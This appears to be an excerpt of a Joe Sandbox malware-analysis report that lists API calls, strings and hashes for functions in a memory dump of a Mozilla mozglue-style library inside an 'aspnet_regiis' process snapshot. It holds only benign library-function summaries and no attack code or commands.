                                                                                                                                                                      • Part of subcall function 6C7CAB89: LeaveCriticalSection.KERNEL32(6C81E370,?,6C7934DE,6C81F6CC,?,?,?,?,?,?,?,6C793284,?,?,6C7B56F6), ref: 6C7CABD1
                                                                                                                                                                    • LoadLibraryW.KERNEL32(combase.dll,6C7A1C5F), ref: 6C7A20AE
                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,CoInitializeSecurity), ref: 6C7A20CD
                                                                                                                                                                    • __Init_thread_footer.LIBCMT ref: 6C7A20E1
                                                                                                                                                                    • FreeLibrary.KERNEL32 ref: 6C7A2124
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.3402785272.000000006C791000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C790000, based on PE: true
                                                                                                                                                                    • Associated: 00000003.00000002.3402710092.000000006C790000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                    • Associated: 00000003.00000002.3402896622.000000006C80D000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                    • Associated: 00000003.00000002.3402949769.000000006C81E000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                                                    • Associated: 00000003.00000002.3402999327.000000006C822000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c790000_aspnet_regiis.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CriticalLibrarySection$AddressEnterFreeInit_thread_footerLeaveLoadProc
                                                                                                                                                                    • String ID: CoInitializeSecurity$combase.dll
                                                                                                                                                                    APIs
                                                                                                                                                                    • WideCharToMultiByte.KERNEL32 ref: 6C7F76F2
                                                                                                                                                                    • moz_xmalloc.MOZGLUE(00000001), ref: 6C7F7705
                                                                                                                                                                      • Part of subcall function 6C7ACA10: malloc.MOZGLUE(?), ref: 6C7ACA26
                                                                                                                                                                    • memset.VCRUNTIME140(00000000,00000000,00000001), ref: 6C7F7717
                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,6C7F778F,00000000,00000000,00000000,00000000), ref: 6C7F7731
                                                                                                                                                                    • free.MOZGLUE(00000000), ref: 6C7F7760
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.3402785272.000000006C791000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C790000, based on PE: true
                                                                                                                                                                    • Associated: 00000003.00000002.3402710092.000000006C790000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                    • Associated: 00000003.00000002.3402896622.000000006C80D000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                    • Associated: 00000003.00000002.3402949769.000000006C81E000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                                                    • Associated: 00000003.00000002.3402999327.000000006C822000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c790000_aspnet_regiis.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ByteCharMultiWide$freemallocmemsetmoz_xmalloc
                                                                                                                                                                    • String ID: }>}l
                                                                                                                                                                    APIs
                                                                                                                                                                      • Part of subcall function 6C7CAB89: EnterCriticalSection.KERNEL32(6C81E370,?,?,?,6C7934DE,6C81F6CC,?,?,?,?,?,?,?,6C793284), ref: 6C7CAB94
                                                                                                                                                                      • Part of subcall function 6C7CAB89: LeaveCriticalSection.KERNEL32(6C81E370,?,6C7934DE,6C81F6CC,?,?,?,?,?,?,?,6C793284,?,?,6C7B56F6), ref: 6C7CABD1
                                                                                                                                                                    • LoadLibraryW.KERNEL32(combase.dll,?), ref: 6C7A1FDE
                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,CoCreateInstance), ref: 6C7A1FFD
                                                                                                                                                                    • __Init_thread_footer.LIBCMT ref: 6C7A2011
                                                                                                                                                                    • FreeLibrary.KERNEL32 ref: 6C7A2059
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.3402785272.000000006C791000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C790000, based on PE: true
                                                                                                                                                                    • Associated: 00000003.00000002.3402710092.000000006C790000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                    • Associated: 00000003.00000002.3402896622.000000006C80D000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                    • Associated: 00000003.00000002.3402949769.000000006C81E000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                                                    • Associated: 00000003.00000002.3402999327.000000006C822000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c790000_aspnet_regiis.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CriticalLibrarySection$AddressEnterFreeInit_thread_footerLeaveLoadProc
                                                                                                                                                                    • String ID: CoCreateInstance$combase.dll
                                                                                                                                                                    APIs
                                                                                                                                                                      • Part of subcall function 6C7CAB89: EnterCriticalSection.KERNEL32(6C81E370,?,?,?,6C7934DE,6C81F6CC,?,?,?,?,?,?,?,6C793284), ref: 6C7CAB94
                                                                                                                                                                      • Part of subcall function 6C7CAB89: LeaveCriticalSection.KERNEL32(6C81E370,?,6C7934DE,6C81F6CC,?,?,?,?,?,?,?,6C793284,?,?,6C7B56F6), ref: 6C7CABD1
                                                                                                                                                                    • LoadLibraryW.KERNEL32(combase.dll,00000000,?,6C7CD9F0,00000000), ref: 6C7A0F1D
                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,CoInitializeEx), ref: 6C7A0F3C
                                                                                                                                                                    • __Init_thread_footer.LIBCMT ref: 6C7A0F50
                                                                                                                                                                    • FreeLibrary.KERNEL32(?,6C7CD9F0,00000000), ref: 6C7A0F86
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.3402785272.000000006C791000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C790000, based on PE: true
                                                                                                                                                                    • Associated: 00000003.00000002.3402710092.000000006C790000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                    • Associated: 00000003.00000002.3402896622.000000006C80D000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                    • Associated: 00000003.00000002.3402949769.000000006C81E000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                                                    • Associated: 00000003.00000002.3402999327.000000006C822000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c790000_aspnet_regiis.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CriticalLibrarySection$AddressEnterFreeInit_thread_footerLeaveLoadProc
                                                                                                                                                                    • String ID: CoInitializeEx$combase.dll
                                                                                                                                                                    APIs
                                                                                                                                                                      • Part of subcall function 6C7D9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C7A4A68), ref: 6C7D945E
                                                                                                                                                                      • Part of subcall function 6C7D9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C7D9470
                                                                                                                                                                      • Part of subcall function 6C7D9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C7D9482
                                                                                                                                                                      • Part of subcall function 6C7D9420: __Init_thread_footer.LIBCMT ref: 6C7D949F
                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6C7DF559
                                                                                                                                                                    • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C7DF561
                                                                                                                                                                      • Part of subcall function 6C7D94D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6C7D94EE
                                                                                                                                                                      • Part of subcall function 6C7D94D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6C7D9508
                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6C7DF577
                                                                                                                                                                    • AcquireSRWLockExclusive.KERNEL32(6C81F4B8), ref: 6C7DF585
                                                                                                                                                                    • ReleaseSRWLockExclusive.KERNEL32(6C81F4B8), ref: 6C7DF5A3
                                                                                                                                                                    Strings
                                                                                                                                                                    • [I %d/%d] profiler_pause_sampling, xrefs: 6C7DF3A8
                                                                                                                                                                    • [I %d/%d] profiler_resume, xrefs: 6C7DF239
                                                                                                                                                                    • [I %d/%d] profiler_resume_sampling, xrefs: 6C7DF499
                                                                                                                                                                    • [D %d/%d] profiler_add_sampled_counter(%s), xrefs: 6C7DF56A
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.3402785272.000000006C791000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C790000, based on PE: true
                                                                                                                                                                    • Associated: 00000003.00000002.3402710092.000000006C790000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                    • Associated: 00000003.00000002.3402896622.000000006C80D000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                    • Associated: 00000003.00000002.3402949769.000000006C81E000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                                                    • Associated: 00000003.00000002.3402999327.000000006C822000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c790000_aspnet_regiis.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: getenv$CurrentExclusiveLockThread$AcquireInit_thread_footerRelease__acrt_iob_func__stdio_common_vfprintf_getpid
                                                                                                                                                                    • String ID: [D %d/%d] profiler_add_sampled_counter(%s)$[I %d/%d] profiler_pause_sampling$[I %d/%d] profiler_resume$[I %d/%d] profiler_resume_sampling
                                                                                                                                                                    • API String ID: 2848912005-2840072211
                                                                                                                                                                    APIs
                                                                                                                                                                    • LoadLibraryW.KERNEL32(kernel32.dll,6C7A0DF8), ref: 6C7A0E82
                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,GetProcessMitigationPolicy), ref: 6C7A0EA1
                                                                                                                                                                    • __Init_thread_footer.LIBCMT ref: 6C7A0EB5
                                                                                                                                                                    • FreeLibrary.KERNEL32 ref: 6C7A0EC5
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.3402785272.000000006C791000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C790000, based on PE: true
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c790000_aspnet_regiis.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Library$AddressFreeInit_thread_footerLoadProc
                                                                                                                                                                    • String ID: GetProcessMitigationPolicy$kernel32.dll
                                                                                                                                                                    • API String ID: 391052410-1680159014
                                                                                                                                                                    APIs
                                                                                                                                                                      • Part of subcall function 6C7D9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C7A4A68), ref: 6C7D945E
                                                                                                                                                                      • Part of subcall function 6C7D9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C7D9470
                                                                                                                                                                      • Part of subcall function 6C7D9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C7D9482
                                                                                                                                                                      • Part of subcall function 6C7D9420: __Init_thread_footer.LIBCMT ref: 6C7D949F
                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6C7DF619
                                                                                                                                                                    • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,00000000,?,6C7DF598), ref: 6C7DF621
                                                                                                                                                                      • Part of subcall function 6C7D94D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6C7D94EE
                                                                                                                                                                      • Part of subcall function 6C7D94D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6C7D9508
                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6C7DF637
                                                                                                                                                                    • AcquireSRWLockExclusive.KERNEL32(6C81F4B8,?,?,00000000,?,6C7DF598), ref: 6C7DF645
                                                                                                                                                                    • ReleaseSRWLockExclusive.KERNEL32(6C81F4B8,?,?,00000000,?,6C7DF598), ref: 6C7DF663
                                                                                                                                                                    Strings
                                                                                                                                                                    • [D %d/%d] profiler_remove_sampled_counter(%s), xrefs: 6C7DF62A
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.3402785272.000000006C791000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C790000, based on PE: true
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c790000_aspnet_regiis.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: getenv$CurrentExclusiveLockThread$AcquireInit_thread_footerRelease__acrt_iob_func__stdio_common_vfprintf_getpid
                                                                                                                                                                    • String ID: [D %d/%d] profiler_remove_sampled_counter(%s)
                                                                                                                                                                    • API String ID: 2848912005-753366533
                                                                                                                                                                    APIs
                                                                                                                                                                    • strlen.API-MS-WIN-CRT-STRING-L1-1-0(<jemalloc>,?,?,?,?,6C7CCFAE,?,?,?,6C7931A7), ref: 6C7D05FB
                                                                                                                                                                    • _write.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,<jemalloc>,00000000,6C7CCFAE,?,?,?,6C7931A7), ref: 6C7D0616
                                                                                                                                                                    • strlen.API-MS-WIN-CRT-STRING-L1-1-0(: (malloc) Error in VirtualFree(),?,?,?,?,?,?,?,6C7931A7), ref: 6C7D061C
                                                                                                                                                                    • _write.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,: (malloc) Error in VirtualFree(),00000000,?,?,?,?,?,?,?,?,6C7931A7), ref: 6C7D0627
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.3402785272.000000006C791000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C790000, based on PE: true
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c790000_aspnet_regiis.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: _writestrlen
                                                                                                                                                                    • String ID: : (malloc) Error in VirtualFree()$<jemalloc>
                                                                                                                                                                    • API String ID: 2723441310-2186867486
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.3402785272.000000006C791000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C790000, based on PE: true
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c790000_aspnet_regiis.jbxd
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6C7F14C5
                                                                                                                                                                    • ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C7F14E2
                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6C7F1546
                                                                                                                                                                    • InitializeConditionVariable.KERNEL32(?), ref: 6C7F15BA
                                                                                                                                                                    • free.MOZGLUE(?), ref: 6C7F16B4
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.3402785272.000000006C791000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C790000, based on PE: true
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c790000_aspnet_regiis.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CurrentThread$ConditionInitializeNow@Stamp@mozilla@@TimeV12@_Variablefree
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 1909280232-0
                                                                                                                                                                    APIs
                                                                                                                                                                    • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?), ref: 6C7E9FDB
                                                                                                                                                                    • free.MOZGLUE(?,?), ref: 6C7E9FF0
                                                                                                                                                                    • free.MOZGLUE(?,?), ref: 6C7EA006
                                                                                                                                                                    • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?), ref: 6C7EA0BE
                                                                                                                                                                    • free.MOZGLUE(?,?), ref: 6C7EA0D5
                                                                                                                                                                    • free.MOZGLUE(?,?), ref: 6C7EA0EB
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.3402785272.000000006C791000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C790000, based on PE: true
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c790000_aspnet_regiis.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: free$StampTimeV01@@Value@mozilla@@
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 956590011-0
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6C7EDC60
                                                                                                                                                                    • AcquireSRWLockExclusive.KERNEL32(?,?,?,6C7ED38A,?), ref: 6C7EDC6F
                                                                                                                                                                    • free.MOZGLUE(?,?,?,?,?,6C7ED38A,?), ref: 6C7EDCC1
                                                                                                                                                                    • ReleaseSRWLockExclusive.KERNEL32(?,?,?,?,?,?,?,6C7ED38A,?), ref: 6C7EDCE9
                                                                                                                                                                    • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?,?,6C7ED38A,?), ref: 6C7EDD05
                                                                                                                                                                    • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(00000001,?,?,?,6C7ED38A,?), ref: 6C7EDD4A
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.3402785272.000000006C791000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C790000, based on PE: true
                                                                                                                                                                     • Associated: 00000003.00000002.3402710092.000000006C790000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                     • Associated: 00000003.00000002.3402896622.000000006C80D000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                     • Associated: 00000003.00000002.3402949769.000000006C81E000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                                                     • Associated: 00000003.00000002.3402999327.000000006C822000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c790000_aspnet_regiis.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ExclusiveLockStampTimeV01@@Value@mozilla@@$AcquireCurrentReleaseThreadfree
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 1842996449-0
                                                                                                                                                                    • Opcode ID: 40fb21649571bad7aa7970b8c0075c3a679bb02ef5248d9f76feabbe590f02d7
                                                                                                                                                                    • Instruction ID: acb37783bb6fe1a43968c2205bb41e2f379fa7848263e0c5302a345f40a594af
                                                                                                                                                                    • Opcode Fuzzy Hash: 40fb21649571bad7aa7970b8c0075c3a679bb02ef5248d9f76feabbe590f02d7
                                                                                                                                                                    • Instruction Fuzzy Hash: D6419CB6A00216CFCB40CF99C9859AABBF6FF8C318B154469D905ABB20D771FC00CB90
                                                                                                                                                                    APIs
                                                                                                                                                                      • Part of subcall function 6C7CFA80: GetCurrentThreadId.KERNEL32 ref: 6C7CFA8D
                                                                                                                                                                      • Part of subcall function 6C7CFA80: AcquireSRWLockExclusive.KERNEL32(6C81F448), ref: 6C7CFA99
                                                                                                                                                                    • ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C7D6727
                                                                                                                                                                    • ?GetOrAddIndex@UniqueJSONStrings@baseprofiler@mozilla@@AAEIABV?$Span@$$CBD$0PPPPPPPP@@3@@Z.MOZGLUE(?,?,?,?,?,?,?,00000001), ref: 6C7D67C8
                                                                                                                                                                      • Part of subcall function 6C7E4290: memcpy.VCRUNTIME140(?,?,6C7F2003,6C7F0AD9,?,6C7F0AD9,00000000,?,6C7F0AD9,?,00000004,?,6C7F1A62,?,6C7F2003,?), ref: 6C7E42C4
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.3402785272.000000006C791000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C790000, based on PE: true
                                                                                                                                                                     • Associated: 00000003.00000002.3402710092.000000006C790000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                     • Associated: 00000003.00000002.3402896622.000000006C80D000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                     • Associated: 00000003.00000002.3402949769.000000006C81E000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                                                     • Associated: 00000003.00000002.3402999327.000000006C822000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c790000_aspnet_regiis.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ExclusiveLock$AcquireCurrentIndex@P@@3@@ReleaseSpan@$$Strings@baseprofiler@mozilla@@ThreadUniquememcpy
                                                                                                                                                                    • String ID: data
                                                                                                                                                                    • API String ID: 511789754-2918445923
                                                                                                                                                                    • Opcode ID: bddff6b76d2220ea69f2a306371ab0660cf95b0c07a6a1207f2d2fe843c29953
                                                                                                                                                                    • Instruction ID: eda6aa1d2a8ef6e6d9e0f90101cf8e6c016e88af8d12ea5f613af4987a63aeab
                                                                                                                                                                    • Opcode Fuzzy Hash: bddff6b76d2220ea69f2a306371ab0660cf95b0c07a6a1207f2d2fe843c29953
                                                                                                                                                                    • Instruction Fuzzy Hash: AED1D075A083418FD724CF24CA49B9FB7E5AFD5308F108D2EE58987B51DB30A949CB92
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetFileInformationByHandle.KERNEL32(00000000,?), ref: 6C7CF480
                                                                                                                                                                      • Part of subcall function 6C79F100: LoadLibraryW.KERNEL32(shell32,?,6C80D020), ref: 6C79F122
                                                                                                                                                                      • Part of subcall function 6C79F100: GetProcAddress.KERNEL32(00000000,SHGetKnownFolderPath), ref: 6C79F132
                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 6C7CF555
                                                                                                                                                                      • Part of subcall function 6C7A14B0: wcslen.API-MS-WIN-CRT-STRING-L1-1-0(6C7A1248,6C7A1248,?), ref: 6C7A14C9
                                                                                                                                                                      • Part of subcall function 6C7A14B0: memcpy.VCRUNTIME140(?,6C7A1248,00000000,?,6C7A1248,?), ref: 6C7A14EF
                                                                                                                                                                      • Part of subcall function 6C79EEA0: memcpy.VCRUNTIME140(?,?,?), ref: 6C79EEE3
                                                                                                                                                                    • CreateFileW.KERNEL32 ref: 6C7CF4FD
                                                                                                                                                                    • GetFileInformationByHandle.KERNEL32(00000000), ref: 6C7CF523
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.3402785272.000000006C791000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C790000, based on PE: true
                                                                                                                                                                     • Associated: 00000003.00000002.3402710092.000000006C790000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                     • Associated: 00000003.00000002.3402896622.000000006C80D000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                     • Associated: 00000003.00000002.3402949769.000000006C81E000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                                                     • Associated: 00000003.00000002.3402999327.000000006C822000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c790000_aspnet_regiis.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: FileHandle$Informationmemcpy$AddressCloseCreateLibraryLoadProcwcslen
                                                                                                                                                                    • String ID: \oleacc.dll
                                                                                                                                                                    • API String ID: 2595878907-3839883404
                                                                                                                                                                    • Opcode ID: ba102e80b17c42ffb634b6d35d0a598f03835573f5be97c74bce8095909e9ba4
                                                                                                                                                                    • Instruction ID: 94356365dac283f7867e2f601eb238319083c4f976e932ea8e4508ec38c04cc2
                                                                                                                                                                    • Opcode Fuzzy Hash: ba102e80b17c42ffb634b6d35d0a598f03835573f5be97c74bce8095909e9ba4
                                                                                                                                                                    • Instruction Fuzzy Hash: 5641B4707087119FE720DF68DA88A9BB7F4AF44318F100A2CF69583650EB30DA49CB93
                                                                                                                                                                    APIs
                                                                                                                                                                      • Part of subcall function 6C7D9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C7A4A68), ref: 6C7D945E
                                                                                                                                                                      • Part of subcall function 6C7D9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C7D9470
                                                                                                                                                                      • Part of subcall function 6C7D9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C7D9482
                                                                                                                                                                      • Part of subcall function 6C7D9420: __Init_thread_footer.LIBCMT ref: 6C7D949F
                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6C7DE047
                                                                                                                                                                    • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C7DE04F
                                                                                                                                                                      • Part of subcall function 6C7D94D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6C7D94EE
                                                                                                                                                                      • Part of subcall function 6C7D94D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6C7D9508
                                                                                                                                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C7DE09C
                                                                                                                                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C7DE0B0
                                                                                                                                                                    Strings
                                                                                                                                                                    • [I %d/%d] profiler_get_profile, xrefs: 6C7DE057
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.3402785272.000000006C791000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C790000, based on PE: true
                                                                                                                                                                     • Associated: 00000003.00000002.3402710092.000000006C790000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                     • Associated: 00000003.00000002.3402896622.000000006C80D000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                     • Associated: 00000003.00000002.3402949769.000000006C81E000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                                                     • Associated: 00000003.00000002.3402999327.000000006C822000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c790000_aspnet_regiis.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: getenv$free$CurrentInit_thread_footerThread__acrt_iob_func__stdio_common_vfprintf_getpid
                                                                                                                                                                    • String ID: [I %d/%d] profiler_get_profile
                                                                                                                                                                    • API String ID: 1832963901-4276087706
                                                                                                                                                                    • Opcode ID: 554bc3284c8aca6d3213ca1c96bc9de6e18cb298a01b71499f14612810854671
                                                                                                                                                                    • Instruction ID: a1276f1c1a6d6c7b9ba29b267d056351b05ce7b00d433d3912503d4e8540ec61
                                                                                                                                                                    • Opcode Fuzzy Hash: 554bc3284c8aca6d3213ca1c96bc9de6e18cb298a01b71499f14612810854671
                                                                                                                                                                    • Instruction Fuzzy Hash: 4721BE74B001098FDF059F64CA5CAAEBBB5AF8520CF254438E90AA7B41DB31B909C7E1
                                                                                                                                                                    APIs
                                                                                                                                                                    • SetLastError.KERNEL32(00000000), ref: 6C7F7526
                                                                                                                                                                    • __Init_thread_footer.LIBCMT ref: 6C7F7566
                                                                                                                                                                    • __Init_thread_footer.LIBCMT ref: 6C7F7597
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.3402785272.000000006C791000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C790000, based on PE: true
                                                                                                                                                                     • Associated: 00000003.00000002.3402710092.000000006C790000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                     • Associated: 00000003.00000002.3402896622.000000006C80D000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                     • Associated: 00000003.00000002.3402949769.000000006C81E000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                                                     • Associated: 00000003.00000002.3402999327.000000006C822000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c790000_aspnet_regiis.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Init_thread_footer$ErrorLast
                                                                                                                                                                    • String ID: UnmapViewOfFile2$kernel32.dll
